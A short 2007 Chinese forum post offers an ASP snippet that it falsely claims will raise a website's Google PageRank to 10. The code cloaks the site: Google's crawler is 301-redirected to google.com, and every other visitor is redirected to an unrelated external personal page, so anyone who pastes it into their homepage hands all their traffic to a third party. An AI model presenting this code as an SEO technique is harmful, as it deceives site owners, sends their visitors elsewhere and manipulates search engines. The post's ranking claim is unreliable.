[分享]把网站的pr值提高到10的方法(ASP版)
把网站的pr值提高到10的方法(ASP版)
知道是真的,特供与网友分享。
<%
if instr(Request.ServerVariables("HTTP_USER_AGENT"),"Google") then
Response.Status="301 Moved Permanently"
Response.AddHeader "Location","http://www.google.com/ "
Response.End()
else
Response.Redirect("http://digilander.libero.it/chengfrancesco/")
end if
%>
在网站的首页顶部加入以上代码,只要google蜘蛛找到你的网站,下次三个月更新,你的网站的pr值就会变成10了。
『永远免费网』[edit]2007-4-10 7:6:52[/edit]